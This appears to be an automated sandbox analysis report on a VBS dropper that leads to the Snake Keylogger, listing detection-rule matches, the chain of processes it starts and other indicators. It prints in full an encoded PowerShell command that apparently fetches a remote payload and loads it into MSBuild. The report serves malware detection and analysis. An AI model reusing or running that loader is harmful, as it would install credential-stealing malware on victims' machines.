                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Potential malicious VBS script found (suspicious strings)
                  Source: Initial file: Dim cmd 'string: ShellExecute arg #1
                  Source: Initial file: Dim args 'string: ShellExecute arg #2
                  Source: Initial file: Dim pwd 'string: ShellExecute arg #3
                  Source: Initial file: Dim privileges 'string: ShellExecute arg #4
                  Source: Initial file: .ShellExecute cmd, args, pwd, privileges
                  Source: Initial file: Dim cmd 'string: ShellExecute arg #1
                  Source: Initial file: 'Class scope: args_ 'string: ShellExecute arg #2
                  Source: Initial file: Dim pwd 'string: ShellExecute arg #3
                  Source: Initial file: Dim privileges 'string: ShellExecute arg #4
                  Source: Initial file: .ShellExecute cmd, args_, pwd, privileges
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAA
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAAJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC5AA80D2_2_00007FFAAC5AA80D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC5AA2C02_2_00007FFAAC5AA2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FED27811_2_02FED278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FE537011_2_02FE5370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FEA08811_2_02FEA088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FEC14611_2_02FEC146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FE711811_2_02FE7118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FEC73811_2_02FEC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FEC46811_2_02FEC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FECA0811_2_02FECA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FE69A011_2_02FE69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FEE98811_2_02FEE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FECFAA11_2_02FECFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FECCD811_2_02FECCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FE3AA111_2_02FE3AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FE29EC11_2_02FE29EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FE39ED11_2_02FE39ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FEE97A11_2_02FEE97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FEF96111_2_02FEF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_02FE3E0911_2_02FE3E09
                  Source: jjmax il.vbsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2968
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2968Jump to behavior
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@8/3@7/6
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\VBScriptingJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofuv52uo.jql.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.0000000003493000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.0000000003450000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.000000000346E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.0000000003460000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: jjmax il.vbsVirustotal: Detection: 18%
                  Source: jjmax il.vbsReversingLabs: Detection: 13%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkA